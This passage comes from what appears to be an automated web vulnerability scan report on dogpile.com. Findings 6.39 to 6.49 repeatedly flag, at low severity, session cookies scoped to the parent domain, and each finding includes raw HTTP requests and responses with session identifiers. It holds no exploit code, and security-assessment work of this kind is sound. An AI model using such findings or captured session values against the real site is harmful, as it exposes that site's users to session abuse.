Host: www.dogpile.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: DomainSession=TransactionId=93618d10e4ac4e349df4c16a3af0cb01&SessionId=9f70fd7ba5d44939a525c16a3af0cb01&PrevActionId=0bca44db8e72477aac9fc16a3af0cb01&ActionId=f61de8d9831c485b9678c16a3af0cb01&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Fri, 01-Apr-2011 17:18:44 GMT; path=/
Set-Cookie: DomainUserProfile=AnonymousId=9586353d328349b18887c16a3af0cb01&LastSeenDateTime=4/1/2011 4:58:44 PM&IssueDateTime=4/1/2011 4:55:38 PM&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Sun, 08-Mar-2111 16:58:44 GMT; path=/
X-Powered-By: ASP.NET
Date: Fri, 01 Apr 2011 16:58:43 GMT
Connection: close
Content-Length: 42313
Vary: Accept-Encoding, User-Agent

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" id="DocumentRoot">
<head>


...[SNIP]...

6.39. http://www.dogpile.com/dogpile_other/ws/offsite-forms/rfcid=1219/rfcp=quickstart-3/_iceUrlFlag=11

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.dogpile.com
Path:   /dogpile_other/ws/offsite-forms/rfcid=1219/rfcp=quickstart-3/_iceUrlFlag=11

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /dogpile_other/ws/offsite-forms/rfcid=1219/rfcp=quickstart-3/_iceUrlFlag=11 HTTP/1.1
Host: www.dogpile.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: DomainSession=TransactionId=93618d10e4ac4e349df4c16a3af0cb01&SessionId=9f70fd7ba5d44939a525c16a3af0cb01&PrevActionId=0bca44db8e72477aac9fc16a3af0cb01&ActionId=4be46901fe6f41908e5ec16a3af0cb01&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Fri, 01-Apr-2011 17:18:37 GMT; path=/
Set-Cookie: DomainUserProfile=AnonymousId=9586353d328349b18887c16a3af0cb01&LastSeenDateTime=4/1/2011 4:58:37 PM&IssueDateTime=4/1/2011 4:55:38 PM&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Sun, 08-Mar-2111 16:58:37 GMT; path=/
X-Powered-By: ASP.NET
Date: Fri, 01 Apr 2011 16:58:37 GMT
Connection: close
Content-Length: 45658
Vary: Accept-Encoding, User-Agent

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" id="DocumentRoot">
<head>


...[SNIP]...

6.40. http://www.dogpile.com/dogpile_other/ws/preferences/_iceUrlFlag=11

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.dogpile.com
Path:   /dogpile_other/ws/preferences/_iceUrlFlag=11

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /dogpile_other/ws/preferences/_iceUrlFlag=11?_IceUrl=true HTTP/1.1
Host: www.dogpile.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Expires: Fri, 01 Apr 2011 16:58:06 GMT
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: DomainSession=TransactionId=93618d10e4ac4e349df4c16a3af0cb01&SessionId=9f70fd7ba5d44939a525c16a3af0cb01&PrevActionId=0bca44db8e72477aac9fc16a3af0cb01&ActionId=0d789ad599844ecb8757c16a3af0cb01&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Fri, 01-Apr-2011 17:18:06 GMT; path=/
Set-Cookie: DomainUserProfile=AnonymousId=9586353d328349b18887c16a3af0cb01&LastSeenDateTime=4/1/2011 4:58:06 PM&IssueDateTime=4/1/2011 4:55:38 PM&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Sun, 08-Mar-2111 16:58:06 GMT; path=/
X-Powered-By: ASP.NET
Date: Fri, 01 Apr 2011 16:58:06 GMT
Connection: close
Content-Length: 51033
Vary: Accept-Encoding, User-Agent

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" id="DocumentRoot">
<head>


...[SNIP]...

6.41. http://www.dogpile.com/dogpile_other/ws/preferences/rfcid=415/rfcp=TopNavigation/_iceUrlFlag=11

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.dogpile.com
Path:   /dogpile_other/ws/preferences/rfcid=415/rfcp=TopNavigation/_iceUrlFlag=11

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /dogpile_other/ws/preferences/rfcid=415/rfcp=TopNavigation/_iceUrlFlag=11 HTTP/1.1
Host: www.dogpile.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Expires: Fri, 01 Apr 2011 16:58:05 GMT
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: DomainSession=TransactionId=93618d10e4ac4e349df4c16a3af0cb01&SessionId=9f70fd7ba5d44939a525c16a3af0cb01&PrevActionId=0bca44db8e72477aac9fc16a3af0cb01&ActionId=b178c96e1aba4492b2dac16a3af0cb01&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Fri, 01-Apr-2011 17:18:05 GMT; path=/
Set-Cookie: DomainUserProfile=AnonymousId=9586353d328349b18887c16a3af0cb01&LastSeenDateTime=4/1/2011 4:58:05 PM&IssueDateTime=4/1/2011 4:55:38 PM&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Sun, 08-Mar-2111 16:58:05 GMT; path=/
X-Powered-By: ASP.NET
Date: Fri, 01 Apr 2011 16:58:05 GMT
Connection: close
Content-Length: 51035
Vary: Accept-Encoding, User-Agent

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" id="DocumentRoot">
<head>


...[SNIP]...

6.42. http://www.dogpile.com/dogpile_other/ws/privacy/_iceUrlFlag=11

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.dogpile.com
Path:   /dogpile_other/ws/privacy/_iceUrlFlag=11

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /dogpile_other/ws/privacy/_iceUrlFlag=11 HTTP/1.1
Host: www.dogpile.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: DomainSession=TransactionId=93618d10e4ac4e349df4c16a3af0cb01&SessionId=9f70fd7ba5d44939a525c16a3af0cb01&PrevActionId=0bca44db8e72477aac9fc16a3af0cb01&ActionId=d08462ba76864b45a153c16a3af0cb01&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Fri, 01-Apr-2011 17:18:35 GMT; path=/
Set-Cookie: DomainUserProfile=AnonymousId=9586353d328349b18887c16a3af0cb01&LastSeenDateTime=4/1/2011 4:58:35 PM&IssueDateTime=4/1/2011 4:55:38 PM&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Sun, 08-Mar-2111 16:58:35 GMT; path=/
X-Powered-By: ASP.NET
Date: Fri, 01 Apr 2011 16:58:35 GMT
Connection: close
Content-Length: 62215
Vary: Accept-Encoding, User-Agent

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" id="DocumentRoot">
<head>


...[SNIP]...

6.43. http://www.dogpile.com/dogpile_other/ws/redir/_iceUrlFlag=11

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.dogpile.com
Path:   /dogpile_other/ws/redir/_iceUrlFlag=11

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

POST /dogpile_other/ws/redir/_iceUrlFlag=11?_IceUrl=true HTTP/1.1
Host: www.dogpile.com
Proxy-Connection: keep-alive
Referer: http://www.dogpile.com/dogpile_other/ws/faq/_iceUrlFlag=11?_IceUrl=true
Content-Length: 2186
Cache-Control: max-age=0
Origin: http://www.dogpile.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: wsTemp=bigIP+3792213258.20480.0000+cacheId+ms20:1301676964559; wsRecent=Go+Daddy+CEO+Elephant,Web,Relevance,&MLB+Schedule,Web,Relevance,; wsViewRecent=1; DomainUserProfile=AnonymousId=9586353d328349b18887c16a3af0cb01&LastSeenDateTime=4/1/2011 4:56:12 PM&IssueDateTime=4/1/2011 4:55:38 PM&CookieDomain=.dogpile.com; DomainSession=TransactionId=93618d10e4ac4e349df4c16a3af0cb01&SessionId=9f70fd7ba5d44939a525c16a3af0cb01&PrevActionId=859dec9ca7a74a60921ac16a3af0cb01&ActionId=fabc047e90564b3caea8c16a3af0cb01&CookieDomain=.dogpile.com

__VIEWSTATE=%2FwEPDwULLTEwNzYxNjAxNjBkGAEFHl9fQ29udHJvbHNSZXF1aXJlUG9zdEJhY2tLZXlfXxYGBR5pY2VQYWdlJFNlYXJjaEJveFRvcCRxa3dzdWJtaXQFLmljZVBhZ2UkU2VhcmNoQm94VG9wJEFkdmFuY2VkU2VhcmNoV2ViJGluY2x1ZGUFLmljZV
...[SNIP]...

Response

HTTP/1.1 302 Found
Cache-Control: private
Content-Type: text/html; charset=utf-8
Location: http://www.dogpile.com/dogpile_other/ws/results/Web/site!3Axss!FEcx/1/417/TopNavigation/Relevance/iq=true/zoom=off/_iceUrlFlag=7?_IceUrl=true
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: DomainSession=TransactionId=ed5033e7ad35480d9635c16a3af0cb01&SessionId=9f70fd7ba5d44939a525c16a3af0cb01&PrevActionId=fabc047e90564b3caea8c16a3af0cb01&ActionId=09595e0bb31848b5a194c16a3af0cb01&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Fri, 01-Apr-2011 17:16:27 GMT; path=/
Set-Cookie: DomainUserProfile=AnonymousId=9586353d328349b18887c16a3af0cb01&LastSeenDateTime=4/1/2011 4:56:27 PM&IssueDateTime=4/1/2011 4:55:38 PM&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Sun, 08-Mar-2111 16:56:27 GMT; path=/
X-Powered-By: ASP.NET
Date: Fri, 01 Apr 2011 16:56:27 GMT
Connection: close
Content-Length: 258

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="http://www.dogpile.com/dogpile_other/ws/results/Web/site!3Axss!FEcx/1/417/TopNavigation/Relevance/iq=true/zoom=off/_i
...[SNIP]...

6.44. http://www.dogpile.com/dogpile_other/ws/redir/qcat=Web/qcoll=relevance/qkw=Dark%20Sites/qlnk=1/rfcp=RightNav/rfcid=302360/_iceUrlFlag=11

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.dogpile.com
Path:   /dogpile_other/ws/redir/qcat=Web/qcoll=relevance/qkw=Dark%20Sites/qlnk=1/rfcp=RightNav/rfcid=302360/_iceUrlFlag=11

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /dogpile_other/ws/redir/qcat=Web/qcoll=relevance/qkw=Dark%20Sites/qlnk=1/rfcp=RightNav/rfcid=302360/_iceUrlFlag=11?_IceUrl=true HTTP/1.1
Host: www.dogpile.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: DomainUserProfile=AnonymousId=8304cc0b8ab744899107c16a3af0cb01&LastSeenDateTime=4/1/2011 5:15:13 PM&IssueDateTime=4/1/2011 5:08:07 PM&CookieDomain=.dogpile.com; wsTemp=bigIP+3808990474.20480.0000+cacheId+ms21:1301678113917; wsRecent=Review+Sites,Web,Relevance,&site%3axss.cx,Web,Relevance,&april+fools+day+pranks,Web,Relevance,&MLB+Schedule,Web,Relevance,&Go+Daddy+CEO+Elephant,Web,Relevance,; wsViewRecent=1; DomainSession=TransactionId=40db304f9bea4e6394bcc16a3af0cb01&SessionId=ee7a38726f9f4b44b1a6c16a3af0cb01&PrevActionId=afded22df52249fea4b3c16a3af0cb01&ActionId=03e0e226b781481fa972c16a3af0cb01&CookieDomain=.dogpile.com

Response

HTTP/1.1 302 Found
Cache-Control: private
Content-Type: text/html; charset=utf-8
Location: http://www.dogpile.com/dogpile_other/ws/results/Web/Dark%20Sites/1/302360/RightNav/Relevance/iq=true/zoom=off/qlnk=1/_iceUrlFlag=7?_IceUrl=true
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: DomainSession=TransactionId=39b2b41ff5024c0491eec16a3af0cb01&SessionId=ee7a38726f9f4b44b1a6c16a3af0cb01&PrevActionId=03e0e226b781481fa972c16a3af0cb01&ActionId=14be2b84e19340ef829ac16a3af0cb01&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Fri, 01-Apr-2011 17:34:59 GMT; path=/
Set-Cookie: DomainUserProfile=AnonymousId=8304cc0b8ab744899107c16a3af0cb01&LastSeenDateTime=4/1/2011 5:14:59 PM&IssueDateTime=4/1/2011 5:08:07 PM&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Sun, 08-Mar-2111 17:14:59 GMT; path=/
X-Powered-By: ASP.NET
Date: Fri, 01 Apr 2011 17:14:59 GMT
Connection: close
Content-Length: 260

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="http://www.dogpile.com/dogpile_other/ws/results/Web/Dark%20Sites/1/302360/RightNav/Relevance/iq=true/zoom=off/qlnk=1/
...[SNIP]...

6.45. http://www.dogpile.com/dogpile_other/ws/redir/qcat=Web/qcoll=relevance/qkw=Review%20Sites/qlnk=1/rfcp=RightNav/rfcid=302357/_iceUrlFlag=11

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.dogpile.com
Path:   /dogpile_other/ws/redir/qcat=Web/qcoll=relevance/qkw=Review%20Sites/qlnk=1/rfcp=RightNav/rfcid=302357/_iceUrlFlag=11

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /dogpile_other/ws/redir/qcat=Web/qcoll=relevance/qkw=Review%20Sites/qlnk=1/rfcp=RightNav/rfcid=302357/_iceUrlFlag=11?_IceUrl=true HTTP/1.1
Host: www.dogpile.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: DomainUserProfile=AnonymousId=8304cc0b8ab744899107c16a3af0cb01&LastSeenDateTime=4/1/2011 5:14:52 PM&IssueDateTime=4/1/2011 5:08:07 PM&CookieDomain=.dogpile.com; wsTemp=bigIP+3741881610.20480.0000+cacheId+ms17:1301678093005; wsRecent=site%3axss.cx,Web,Relevance,&april+fools+day+pranks,Web,Relevance,&MLB+Schedule,Web,Relevance,&Go+Daddy+CEO+Elephant,Web,Relevance,; wsViewRecent=1; DomainSession=TransactionId=8a9366cfe41848d795bec16a3af0cb01&SessionId=ee7a38726f9f4b44b1a6c16a3af0cb01&PrevActionId=c1a8f04152fd49d4bbd5c16a3af0cb01&ActionId=afded22df52249fea4b3c16a3af0cb01&CookieDomain=.dogpile.com

Response

HTTP/1.1 302 Found
Cache-Control: private
Content-Type: text/html; charset=utf-8
Location: http://www.dogpile.com/dogpile_other/ws/results/Web/Review%20Sites/1/302357/RightNav/Relevance/iq=true/zoom=off/qlnk=1/_iceUrlFlag=7?_IceUrl=true
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: DomainSession=TransactionId=147d5eeccb2149eaadeec16a3af0cb01&SessionId=ee7a38726f9f4b44b1a6c16a3af0cb01&PrevActionId=c1a8f04152fd49d4bbd5c16a3af0cb01&ActionId=afded22df52249fea4b3c16a3af0cb01&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Fri, 01-Apr-2011 17:35:13 GMT; path=/
Set-Cookie: DomainUserProfile=AnonymousId=8304cc0b8ab744899107c16a3af0cb01&LastSeenDateTime=4/1/2011 5:15:13 PM&IssueDateTime=4/1/2011 5:08:07 PM&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Sun, 08-Mar-2111 17:15:13 GMT; path=/
X-Powered-By: ASP.NET
Date: Fri, 01 Apr 2011 17:15:13 GMT
Connection: close
Content-Length: 262

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="http://www.dogpile.com/dogpile_other/ws/results/Web/Review%20Sites/1/302357/RightNav/Relevance/iq=true/zoom=off/qlnk=
...[SNIP]...

6.46. http://www.dogpile.com/dogpile_other/ws/redir/qcat=Web/qcoll=relevance/qkw=Submit%20Site/qlnk=1/rfcp=RightNav/rfcid=302362/_iceUrlFlag=11

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.dogpile.com
Path:   /dogpile_other/ws/redir/qcat=Web/qcoll=relevance/qkw=Submit%20Site/qlnk=1/rfcp=RightNav/rfcid=302362/_iceUrlFlag=11

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /dogpile_other/ws/redir/qcat=Web/qcoll=relevance/qkw=Submit%20Site/qlnk=1/rfcp=RightNav/rfcid=302362/_iceUrlFlag=11?_IceUrl=true HTTP/1.1
Host: www.dogpile.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: wsTemp=bigIP+3808990474.20480.0000+cacheId+ms21:1301678113917; wsRecent=Review+Sites,Web,Relevance,&site%3axss.cx,Web,Relevance,&april+fools+day+pranks,Web,Relevance,&MLB+Schedule,Web,Relevance,&Go+Daddy+CEO+Elephant,Web,Relevance,; wsViewRecent=1; DomainUserProfile=AnonymousId=8304cc0b8ab744899107c16a3af0cb01&LastSeenDateTime=4/1/2011 5:15:16 PM&IssueDateTime=4/1/2011 5:08:07 PM&CookieDomain=.dogpile.com; DomainSession=TransactionId=40db304f9bea4e6394bcc16a3af0cb01&SessionId=ee7a38726f9f4b44b1a6c16a3af0cb01&PrevActionId=14be2b84e19340ef829ac16a3af0cb01&ActionId=f99d27d203c74389a638c16a3af0cb01&CookieDomain=.dogpile.com

Response

HTTP/1.1 302 Found
Cache-Control: private
Content-Type: text/html; charset=utf-8
Location: http://www.dogpile.com/dogpile_other/ws/results/Web/Submit%20Site/1/302362/RightNav/Relevance/iq=true/zoom=off/qlnk=1/_iceUrlFlag=7?_IceUrl=true
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: DomainSession=TransactionId=eae10ac2cab145b8a2c3c16a3af0cb01&SessionId=ee7a38726f9f4b44b1a6c16a3af0cb01&PrevActionId=14be2b84e19340ef829ac16a3af0cb01&ActionId=f99d27d203c74389a638c16a3af0cb01&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Fri, 01-Apr-2011 17:35:00 GMT; path=/
Set-Cookie: DomainUserProfile=AnonymousId=8304cc0b8ab744899107c16a3af0cb01&LastSeenDateTime=4/1/2011 5:15:00 PM&IssueDateTime=4/1/2011 5:08:07 PM&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Sun, 08-Mar-2111 17:15:00 GMT; path=/
X-Powered-By: ASP.NET
Date: Fri, 01 Apr 2011 17:14:59 GMT
Connection: close
Content-Length: 261

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="http://www.dogpile.com/dogpile_other/ws/results/Web/Submit%20Site/1/302362/RightNav/Relevance/iq=true/zoom=off/qlnk=1
...[SNIP]...

6.47. http://www.dogpile.com/dogpile_other/ws/redir/qkw=horoscope/rfcid=4400/rfcp=quickstart-6/qlnk=1/_iceUrlFlag=11

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.dogpile.com
Path:   /dogpile_other/ws/redir/qkw=horoscope/rfcid=4400/rfcp=quickstart-6/qlnk=1/_iceUrlFlag=11

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /dogpile_other/ws/redir/qkw=horoscope/rfcid=4400/rfcp=quickstart-6/qlnk=1/_iceUrlFlag=11 HTTP/1.1
Host: www.dogpile.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Cache-Control: private
Content-Type: text/html; charset=utf-8
Location: http://www.dogpile.com/dogpile_other/ws/results/Web/horoscope/1/4400/quickstart-6/Relevance/iq=true/zoom=off/qlnk=1/_iceUrlFlag=7?_IceUrl=true
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: DomainSession=TransactionId=f7359c30922a46e889b5c16a3af0cb01&SessionId=9f70fd7ba5d44939a525c16a3af0cb01&PrevActionId=09595e0bb31848b5a194c16a3af0cb01&ActionId=0bca44db8e72477aac9fc16a3af0cb01&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Fri, 01-Apr-2011 17:17:59 GMT; path=/
Set-Cookie: DomainUserProfile=AnonymousId=9586353d328349b18887c16a3af0cb01&LastSeenDateTime=4/1/2011 4:57:59 PM&IssueDateTime=4/1/2011 4:55:38 PM&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Sun, 08-Mar-2111 16:57:59 GMT; path=/
X-Powered-By: ASP.NET
Date: Fri, 01 Apr 2011 16:57:59 GMT
Connection: close
Content-Length: 259

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="http://www.dogpile.com/dogpile_other/ws/results/Web/horoscope/1/4400/quickstart-6/Relevance/iq=true/zoom=off/qlnk=1/_
...[SNIP]...

6.48. http://www.dogpile.com/dogpile_other/ws/results/Web/Submit%20Site/1/302362/RightNav/Relevance/iq=true/zoom=off/qlnk=1/_iceUrlFlag=7

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.dogpile.com
Path:   /dogpile_other/ws/results/Web/Submit%20Site/1/302362/RightNav/Relevance/iq=true/zoom=off/qlnk=1/_iceUrlFlag=7

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /dogpile_other/ws/results/Web/Submit%20Site/1/302362/RightNav/Relevance/iq=true/zoom=off/qlnk=1/_iceUrlFlag=7?_IceUrl=true HTTP/1.1
Host: www.dogpile.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: wsTemp=bigIP+3808990474.20480.0000+cacheId+ms21:1301678113917; wsRecent=Review+Sites,Web,Relevance,&site%3axss.cx,Web,Relevance,&april+fools+day+pranks,Web,Relevance,&MLB+Schedule,Web,Relevance,&Go+Daddy+CEO+Elephant,Web,Relevance,; wsViewRecent=1; DomainSession=TransactionId=5d61898cfb714cd0bcc4c16a3af0cb01&SessionId=ee7a38726f9f4b44b1a6c16a3af0cb01&PrevActionId=14be2b84e19340ef829ac16a3af0cb01&ActionId=f99d27d203c74389a638c16a3af0cb01&CookieDomain=.dogpile.com; DomainUserProfile=AnonymousId=8304cc0b8ab744899107c16a3af0cb01&LastSeenDateTime=4/1/2011 5:15:18 PM&IssueDateTime=4/1/2011 5:08:07 PM&CookieDomain=.dogpile.com

Response

HTTP/1.1 200 OK
Cache-Control: private
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: DomainSession=TransactionId=5d61898cfb714cd0bcc4c16a3af0cb01&SessionId=ee7a38726f9f4b44b1a6c16a3af0cb01&PrevActionId=8ae6cde94044449ca746c16a3af0cb01&ActionId=8e3deae18a0e4ecc8d67c16a3af0cb01&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Fri, 01-Apr-2011 17:35:19 GMT; path=/
Set-Cookie: DomainUserProfile=AnonymousId=8304cc0b8ab744899107c16a3af0cb01&LastSeenDateTime=4/1/2011 5:15:19 PM&IssueDateTime=4/1/2011 5:08:07 PM&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Sun, 08-Mar-2111 17:15:19 GMT; path=/
Set-Cookie: wsTemp=bigIP+3808990474.20480.0000+cacheId+ms21:1301678119866; path=/
Set-Cookie: wsRecent=Submit+Site,Web,Relevance,&Review+Sites,Web,Relevance,&site%3axss.cx,Web,Relevance,&april+fools+day+pranks,Web,Relevance,&MLB+Schedule,Web,Relevance,&Go+Daddy+CEO+Elephant,Web,Relevance,; path=/
X-Powered-By: ASP.NET
Date: Fri, 01 Apr 2011 17:15:19 GMT
Connection: close
Vary: Accept-Encoding, User-Agent
Content-Length: 159318

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" id="DocumentRoot">
<head>


...[SNIP]...

6.49. http://www.dogpile.com/dogpile_other/ws/termsofuse/_iceUrlFlag=11

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.dogpile.com
Path:   /dogpile_other/ws/termsofuse/_iceUrlFlag=11

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /dogpile_other/ws/termsofuse/_iceUrlFlag=11 HTTP/1.1
Host: www.dogpile.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
